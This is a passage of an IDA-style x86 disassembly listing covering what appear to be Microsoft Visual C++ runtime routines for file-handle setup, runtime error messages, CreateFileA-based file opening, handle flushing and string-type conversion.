add dword_4DD140, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_423BC0: ; CODE XREF: sub_423B0B+CF�j
cmp eax, ecx
jnb short loc_423BDC
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_423BC0
; ---------------------------------------------------------------------------
loc_423BDC: ; CODE XREF: sub_423B0B+B7�j
add edi, 4
cmp dword_4DD140, esi
jl short loc_423BA2
jmp short loc_423BEF
; ---------------------------------------------------------------------------
loc_423BE9: ; CODE XREF: sub_423B0B+A4�j
mov esi, dword_4DD140
loc_423BEF: ; CODE XREF: sub_423B0B+90�j
; sub_423B0B+DC�j
xor edi, edi
test esi, esi
jle short loc_423C3B
loc_423BF5: ; CODE XREF: sub_423B0B+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_423C32
mov cl, [ebp+0]
test cl, 1
jz short loc_423C32
test cl, 8
jnz short loc_423C14
push eax
call ds:dword_427024 ; GetFileType
test eax, eax
jz short loc_423C32
loc_423C14: ; CODE XREF: sub_423B0B+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_4DD040[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_423C32: ; CODE XREF: sub_423B0B+EF�j
; sub_423B0B+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_423BF5
loc_423C3B: ; CODE XREF: sub_423B0B+65�j
; sub_423B0B+71�j ...
xor ebx, ebx
loc_423C3D: ; CODE XREF: sub_423B0B+195�j
mov eax, dword_4DD040
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_423C98
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_423C58
push 0FFFFFFF6h
pop eax
jmp short loc_423C62
; ---------------------------------------------------------------------------
loc_423C58: ; CODE XREF: sub_423B0B+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_423C62: ; CODE XREF: sub_423B0B+14B�j
push eax
call ds:dword_427028 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_423C87
push edi
call ds:dword_427024 ; GetFileType
test eax, eax
jz short loc_423C87
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_423C8D
loc_423C87: ; CODE XREF: sub_423B0B+163�j
; sub_423B0B+16E�j
or byte ptr [esi+4], 40h
jmp short loc_423C9C
; ---------------------------------------------------------------------------
loc_423C8D: ; CODE XREF: sub_423B0B+17A�j
cmp eax, 3
jnz short loc_423C9C
or byte ptr [esi+4], 8
jmp short loc_423C9C
; ---------------------------------------------------------------------------
loc_423C98: ; CODE XREF: sub_423B0B+13E�j
or byte ptr [esi+4], 80h
loc_423C9C: ; CODE XREF: sub_423B0B+180�j
; sub_423B0B+185�j ...
inc ebx
cmp ebx, 3
jl short loc_423C3D
push dword_4DD140
call ds:dword_42702C ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_423B0B endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423CC0 proc near ; DATA XREF: .text:0041E1DD�o
; sub_4228FD+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_423D60
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_423CF3: ; CODE XREF: sub_423CC0+90�j
cmp esi, 0FFFFFFFFh
jz short loc_423D59
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_423D47
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_423D47
js short loc_423D52
mov edi, [ebx+8]
push ebx
call sub_41D550
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41D592
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_41D626
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_423D47: ; CODE XREF: sub_423CC0+40�j
; sub_423CC0+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_423CF3
; ---------------------------------------------------------------------------
loc_423D52: ; CODE XREF: sub_423CC0+54�j
mov eax, 0
jmp short loc_423D75
; ---------------------------------------------------------------------------
loc_423D59: ; CODE XREF: sub_423CC0+36�j
mov eax, 1
jmp short loc_423D75
; ---------------------------------------------------------------------------
loc_423D60: ; CODE XREF: sub_423CC0+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41D592
add esp, 8
pop ebp
mov eax, 1
loc_423D75: ; CODE XREF: sub_423CC0+97�j
; sub_423CC0+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_423CC0 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41D592
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_423D98 proc near ; CODE XREF: sub_41E2C9+9�p
; sub_41E2EE+9�p
mov eax, dword_4DBE3C
cmp eax, 1
jz short loc_423DAF
test eax, eax
jnz short locret_423DD0
cmp dword_43AE44, 1
jnz short locret_423DD0
loc_423DAF: ; CODE XREF: sub_423D98+8�j
push 0FCh
call sub_423DD1
mov eax, dword_4DBFA8
pop ecx
test eax, eax
jz short loc_423DC5
call eax
loc_423DC5: ; CODE XREF: sub_423D98+29�j
push 0FFh
call sub_423DD1
pop ecx
locret_423DD0: ; CODE XREF: sub_423D98+C�j
; sub_423D98+15�j
retn
sub_423D98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423DD1 proc near ; CODE XREF: sub_41E2C9+12�p
; sub_41E2EE+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_43D4D8
loc_423DE4: ; CODE XREF: sub_423DD1+20�j
cmp edx, [eax]
jz short loc_423DF3
add eax, 8
inc ecx
cmp eax, offset off_43D568
jl short loc_423DE4
loc_423DF3: ; CODE XREF: sub_423DD1+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_43D4D8[esi]
jnz loc_423F21
mov eax, dword_4DBE3C
cmp eax, 1
jz loc_423EFB
test eax, eax
jnz short loc_423E24
cmp dword_43AE44, 1
jz loc_423EFB
loc_423E24: ; CODE XREF: sub_423DD1+44�j
cmp edx, 0FCh
jz loc_423F21
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:dword_427078 ; GetModuleFileNameA
test eax, eax
jnz short loc_423E5B
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41C890
pop ecx
pop ecx
loc_423E5B: ; CODE XREF: sub_423DD1+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_41B9C0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_423E9E
lea eax, [ebp+var_1A4]
push eax
call sub_41B9C0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_41BFD0
add esp, 10h
loc_423E9E: ; CODE XREF: sub_423DD1+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_41C890
lea eax, [ebp+var_A0]
push edi
push eax
call sub_41C8A0
lea eax, [ebp+var_A0]
push offset asc_427BF0 ; "\n\n"
push eax
call sub_41C8A0
push off_43D4DC[esi]
lea eax, [ebp+var_A0]
push eax
call sub_41C8A0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_425029
add esp, 2Ch
pop edi
jmp short loc_423F21
; ---------------------------------------------------------------------------
loc_423EFB: ; CODE XREF: sub_423DD1+3C�j
; sub_423DD1+4D�j
lea eax, [ebp+arg_0]
lea esi, off_43D4DC[esi]
push 0
push eax
push dword ptr [esi]
call sub_41B9C0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_427028 ; GetStdHandle
push eax
call ds:dword_4270F0 ; WriteFile
loc_423F21: ; CODE XREF: sub_423DD1+2E�j
; sub_423DD1+59�j ...
pop esi
leave
retn
sub_423DD1 endp
; =============== S U B R O U T I N E =======================================
sub_423F24 proc near ; CODE XREF: sub_42423B:loc_4243B3�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_4DD040
loc_423F33: ; CODE XREF: sub_423F24+48�j
mov eax, [ecx]
test eax, eax
jz short loc_423F70
lea edx, [eax+100h]
loc_423F3F: ; CODE XREF: sub_423F24+28�j
cmp eax, edx
jnb short loc_423F5F
test byte ptr [eax+4], 1
jz short loc_423F4E
add eax, 8
jmp short loc_423F3F
; ---------------------------------------------------------------------------
loc_423F4E: ; CODE XREF: sub_423F24+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_423FB3
loc_423F5F: ; CODE XREF: sub_423F24+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_4DD140
jl short loc_423F33
jmp short loc_423FB3
; ---------------------------------------------------------------------------
loc_423F70: ; CODE XREF: sub_423F24+13�j
mov esi, 100h
push esi
call sub_41BEB5
test eax, eax
pop ecx
jz short loc_423FB3
add dword_4DD140, 20h
lea ecx, ds:4DD040h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_423F96: ; CODE XREF: sub_423F24+88�j
cmp eax, edx
jnb short loc_423FAE
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_423F96
; ---------------------------------------------------------------------------
loc_423FAE: ; CODE XREF: sub_423F24+74�j
shl edi, 5
mov ebx, edi
loc_423FB3: ; CODE XREF: sub_423F24+39�j
; sub_423F24+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_423F24 endp
; =============== S U B R O U T I N E =======================================
sub_423FB9 proc near ; CODE XREF: sub_42423B+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_4DD140
push edi
jnb short loc_424019
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4DD040h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_424019
cmp dword_43AE44, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_42400F
sub eax, 0
jz short loc_424006
dec eax
jz short loc_424001
dec eax
jnz short loc_42400F
push ebx
push 0FFFFFFF4h
jmp short loc_424009
; ---------------------------------------------------------------------------
loc_424001: ; CODE XREF: sub_423FB9+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_424009
; ---------------------------------------------------------------------------
loc_424006: ; CODE XREF: sub_423FB9+3B�j
push ebx
push 0FFFFFFF6h
loc_424009: ; CODE XREF: sub_423FB9+46�j
; sub_423FB9+4B�j
call ds:dword_427020 ; SetStdHandle
loc_42400F: ; CODE XREF: sub_423FB9+36�j
; sub_423FB9+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_42402D
; ---------------------------------------------------------------------------
loc_424019: ; CODE XREF: sub_423FB9+C�j
; sub_423FB9+28�j
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
or eax, 0FFFFFFFFh
loc_42402D: ; CODE XREF: sub_423FB9+5E�j
pop edi
pop esi
retn
sub_423FB9 endp
; =============== S U B R O U T I N E =======================================
sub_424030 proc near ; CODE XREF: sub_41E312+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_4DD140
push edi
jnb short loc_424093
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:4DD040h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_424093
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_424093
cmp dword_43AE44, 1
jnz short loc_424089
xor eax, eax
sub ecx, eax
jz short loc_424080
dec ecx
jz short loc_42407B
dec ecx
jnz short loc_424089
push eax
push 0FFFFFFF4h
jmp short loc_424083
; ---------------------------------------------------------------------------
loc_42407B: ; CODE XREF: sub_424030+41�j
push eax
push 0FFFFFFF5h
jmp short loc_424083
; ---------------------------------------------------------------------------
loc_424080: ; CODE XREF: sub_424030+3E�j
push eax
push 0FFFFFFF6h
loc_424083: ; CODE XREF: sub_424030+49�j
; sub_424030+4E�j
call ds:dword_427020 ; SetStdHandle
loc_424089: ; CODE XREF: sub_424030+38�j
; sub_424030+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_4240A7
; ---------------------------------------------------------------------------
loc_424093: ; CODE XREF: sub_424030+C�j
; sub_424030+2A�j ...
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
or eax, 0FFFFFFFFh
loc_4240A7: ; CODE XREF: sub_424030+61�j
pop edi
pop esi
retn
sub_424030 endp
; =============== S U B R O U T I N E =======================================
sub_4240AA proc near ; CODE XREF: sub_41E312+32�p
; sub_41E312+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4DD140
jnb short loc_4240D2
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4DD040[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_4240D2
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_4240D2: ; CODE XREF: sub_4240AA+A�j
; sub_4240AA+23�j
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
or eax, 0FFFFFFFFh
retn
sub_4240AA endp
; =============== S U B R O U T I N E =======================================
sub_4240E7 proc near ; CODE XREF: sub_41E3F0+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4DD140
jnb short loc_424130
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword_4DD040[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_424130
push eax
call sub_4240AA
pop ecx
push eax
call ds:dword_42701C ; FlushFileBuffers
test eax, eax
jnz short loc_424125
call ds:dword_427094 ; RtlGetLastWin32Error
jmp short loc_424127
; ---------------------------------------------------------------------------
loc_424125: ; CODE XREF: sub_4240E7+34�j
xor eax, eax
loc_424127: ; CODE XREF: sub_4240E7+3C�j
test eax, eax
jz short locret_42413D
mov dword_4DBDE0, eax
loc_424130: ; CODE XREF: sub_4240E7+A�j
; sub_4240E7+22�j
mov dword_4DBDDC, 9
or eax, 0FFFFFFFFh
locret_42413D: ; CODE XREF: sub_4240E7+42�j
retn
sub_4240E7 endp
; =============== S U B R O U T I N E =======================================
sub_42413E proc near ; DATA XREF: .data:00429020�o
mov eax, dword_4DD020
push esi
push 14h
test eax, eax
pop esi
jnz short loc_424152
mov eax, 200h
jmp short loc_424158
; ---------------------------------------------------------------------------
loc_424152: ; CODE XREF: sub_42413E+B�j
cmp eax, esi
jge short loc_42415D
mov eax, esi
loc_424158: ; CODE XREF: sub_42413E+12�j
mov dword_4DD020, eax
loc_42415D: ; CODE XREF: sub_42413E+16�j
push 4
push eax
call sub_4250B2
pop ecx
mov dword_4DC01C, eax
test eax, eax
pop ecx
jnz short loc_424191
push 4
push esi
mov dword_4DD020, esi
call sub_4250B2
pop ecx
mov dword_4DC01C, eax
test eax, eax
pop ecx
jnz short loc_424191
push 1Ah
call sub_41E2C9
pop ecx
loc_424191: ; CODE XREF: sub_42413E+30�j
; sub_42413E+49�j
xor ecx, ecx
mov eax, offset off_43D568
loc_424198: ; CODE XREF: sub_42413E+6E�j
mov edx, dword_4DC01C
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_43D7E8
jl short loc_424198
xor edx, edx
mov ecx, offset dword_43D578
loc_4241B5: ; CODE XREF: sub_42413E+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword_4DD040[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_4241D2
test eax, eax
jnz short loc_4241D5
loc_4241D2: ; CODE XREF: sub_42413E+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_4241D5: ; CODE XREF: sub_42413E+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_43D5D8
jl short loc_4241B5
pop esi
retn
sub_42413E endp
; =============== S U B R O U T I N E =======================================
sub_4241E3 proc near ; DATA XREF: .data:00429030�o
; FUNCTION CHUNK AT 00425163 SIZE 00000058 BYTES
call sub_41E487
cmp byte_4DBE1C, 0
jz short locret_4241F6
jmp loc_425163
; ---------------------------------------------------------------------------
locret_4241F6: ; CODE XREF: sub_4241E3+C�j
retn
sub_4241E3 endp
; =============== S U B R O U T I N E =======================================
sub_4241F7 proc near ; CODE XREF: sub_41F8E3+32�p
; sub_41FE2A+6C�p ...
arg_0 = dword ptr 4
inc dword_4DBFAC
push 1000h
call sub_41BEB5
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_424220
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_424231
; ---------------------------------------------------------------------------
loc_424220: ; CODE XREF: sub_4241F7+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_424231: ; CODE XREF: sub_4241F7+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_4241F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42423B proc near ; CODE XREF: sub_41FBCD+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_424261
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_42426C
; ---------------------------------------------------------------------------
loc_424261: ; CODE XREF: sub_42423B+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_42426C: ; CODE XREF: sub_42423B+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_424286
test ch, 40h
jnz short loc_424282
cmp dword_4DBFF8, eax
jz short loc_424286
loc_424282: ; CODE XREF: sub_42423B+3D�j
or [ebp+var_1], 80h
loc_424286: ; CODE XREF: sub_42423B+38�j
; sub_42423B+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_4242BE
dec eax
jz short loc_4242B5
dec eax
jz short loc_4242AC
loc_424297: ; CODE XREF: sub_42423B+9F�j
; sub_42423B+E8�j ...
mov dword_4DBDDC, 16h
mov dword_4DBDE0, ebx
jmp loc_4244D1
; ---------------------------------------------------------------------------
loc_4242AC: ; CODE XREF: sub_42423B+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_4242C5
; ---------------------------------------------------------------------------
loc_4242B5: ; CODE XREF: sub_42423B+57�j
mov [ebp+var_C], 40000000h
jmp short loc_4242C5
; ---------------------------------------------------------------------------
loc_4242BE: ; CODE XREF: sub_42423B+54�j
mov [ebp+var_C], 80000000h
loc_4242C5: ; CODE XREF: sub_42423B+78�j
; sub_42423B+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_4242F3
cmp eax, 20h
jz short loc_4242EA
cmp eax, 30h
jz short loc_4242E1
cmp eax, 40h
jnz short loc_424297
mov [ebp+var_10], esi
jmp short loc_4242F6
; ---------------------------------------------------------------------------
loc_4242E1: ; CODE XREF: sub_42423B+9A�j
mov [ebp+var_10], 2
jmp short loc_4242F6
; ---------------------------------------------------------------------------
loc_4242EA: ; CODE XREF: sub_42423B+95�j
mov [ebp+var_10], 1
jmp short loc_4242F6
; ---------------------------------------------------------------------------
loc_4242F3: ; CODE XREF: sub_42423B+90�j
mov [ebp+var_10], ebx
loc_4242F6: ; CODE XREF: sub_42423B+A4�j
; sub_42423B+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_424340
jz short loc_42433B
cmp ecx, ebx
jz short loc_42433B
cmp ecx, edi
jz short loc_424332
cmp ecx, 200h
jz short loc_424359
cmp ecx, 300h
jnz loc_424297
mov [ebp+var_8], 2
jmp short loc_424369
; ---------------------------------------------------------------------------
loc_424332: ; CODE XREF: sub_42423B+D8�j
mov [ebp+var_8], 4
jmp short loc_424369
; ---------------------------------------------------------------------------
loc_42433B: ; CODE XREF: sub_42423B+D0�j
; sub_42423B+D4�j
mov [ebp+var_8], esi
jmp short loc_424369
; ---------------------------------------------------------------------------
loc_424340: ; CODE XREF: sub_42423B+CE�j
cmp ecx, 500h
jz short loc_424362
cmp ecx, 600h
jz short loc_424359
cmp ecx, edx
jz short loc_424362
jmp loc_424297
; ---------------------------------------------------------------------------
loc_424359: ; CODE XREF: sub_42423B+E0�j
; sub_42423B+113�j
mov [ebp+var_8], 5
jmp short loc_424369
; ---------------------------------------------------------------------------
loc_424362: ; CODE XREF: sub_42423B+10B�j
; sub_42423B+117�j
mov [ebp+var_8], 1
loc_424369: ; CODE XREF: sub_42423B+F5�j
; sub_42423B+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_424388
mov ecx, dword_4DBDE4
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_424388
push 1
pop esi
loc_424388: ; CODE XREF: sub_42423B+138�j
; sub_42423B+148�j
test al, 40h
jz short loc_424396
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_424396: ; CODE XREF: sub_42423B+14F�j
test ah, 10h
jz short loc_42439D
or esi, edi
loc_42439D: ; CODE XREF: sub_42423B+15E�j
test al, 20h
jz short loc_4243A9
or esi, 8000000h
jmp short loc_4243B3
; ---------------------------------------------------------------------------
loc_4243A9: ; CODE XREF: sub_42423B+164�j
test al, 10h
jz short loc_4243B3
or esi, 10000000h
loc_4243B3: ; CODE XREF: sub_42423B+16C�j
; sub_42423B+170�j
call sub_423F24
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_4243D4
and dword_4DBDE0, 0
mov dword_4DBDDC, 18h
jmp short loc_424412
; ---------------------------------------------------------------------------
loc_4243D4: ; CODE XREF: sub_42423B+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call ds:dword_4270F8 ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_424405
push esi
call ds:dword_427024 ; GetFileType
test eax, eax
jnz short loc_424419
push esi
call ds:dword_427070 ; CloseHandle
loc_424405: ; CODE XREF: sub_42423B+1B6�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
call sub_420C7F
pop ecx
loc_424412: ; CODE XREF: sub_42423B+197�j
mov eax, edi
jmp loc_4244EF
; ---------------------------------------------------------------------------
loc_424419: ; CODE XREF: sub_42423B+1C1�j
cmp eax, 2
jnz short loc_424424
or [ebp+var_1], 40h
jmp short loc_42442D
; ---------------------------------------------------------------------------
loc_424424: ; CODE XREF: sub_42423B+1E1�j
cmp eax, 3
jnz short loc_42442D
or [ebp+var_1], 8
loc_42442D: ; CODE XREF: sub_42423B+1E7�j
; sub_42423B+1EC�j
push esi
push ebx
call sub_423FB9
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:4DD040h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_4244D6
test al, 80h
jz short loc_4244D6
test byte ptr [ebp+arg_4], 2
jz short loc_4244D6
push 2
push 0FFFFFFFFh
push ebx
call sub_422F09
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_42448B
cmp dword_4DBDE0, 83h
jz short loc_4244D6
jmp short loc_4244CA
; ---------------------------------------------------------------------------
loc_42448B: ; CODE XREF: sub_42423B+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41F9BC
add esp, 0Ch
test eax, eax
jnz short loc_4244B8
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_4244B8
push [ebp+var_10]
push ebx
call sub_4251BB
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4244CA
loc_4244B8: ; CODE XREF: sub_42423B+265�j
; sub_42423B+26B�j
push 0
push 0
push ebx
call sub_422F09
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_4244D6
loc_4244CA: ; CODE XREF: sub_42423B+24E�j
; sub_42423B+27B�j
push ebx
call sub_41E312
pop ecx
loc_4244D1: ; CODE XREF: sub_42423B+6C�j
or eax, 0FFFFFFFFh
jmp short loc_4244EF
; ---------------------------------------------------------------------------
loc_4244D6: ; CODE XREF: sub_42423B+221�j
; sub_42423B+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4244ED
test byte ptr [ebp+arg_4], 8
jz short loc_4244ED
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_4244ED: ; CODE XREF: sub_42423B+29F�j
; sub_42423B+2A5�j
mov eax, ebx
loc_4244EF: ; CODE XREF: sub_42423B+1D9�j
; sub_42423B+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_42423B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4244F4 proc near ; CODE XREF: sub_41FDB5+5E�p
; sub_420988+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427C30
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4DBFB4
xor ebx, ebx
cmp eax, ebx
jnz short loc_424563
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_427920
push esi
call ds:dword_427014 ; GetStringTypeW
test eax, eax
jz short loc_424541
mov eax, esi
jmp short loc_42455E
; ---------------------------------------------------------------------------
loc_424541: ; CODE XREF: sub_4244F4+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset word_4CB88C
push esi
push ebx
call ds:dword_427018 ; GetStringTypeA
test eax, eax
jz loc_424629
push 2
pop eax
loc_42455E: ; CODE XREF: sub_4244F4+4B�j
mov dword_4DBFB4, eax
loc_424563: ; CODE XREF: sub_4244F4+2F�j
cmp eax, 2
jnz short loc_42458C
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_424574
mov eax, dword_4DBE84
loc_424574: ; CODE XREF: sub_4244F4+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_427018 ; GetStringTypeA
jmp loc_42462B
; ---------------------------------------------------------------------------
loc_42458C: ; CODE XREF: sub_4244F4+72�j
cmp eax, 1
jnz loc_424629
cmp [ebp+arg_10], ebx
jnz short loc_4245A2
mov eax, dword_4DBE94
mov [ebp+arg_10], eax
loc_4245A2: ; CODE XREF: sub_4244F4+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_4270E8 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_424629
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
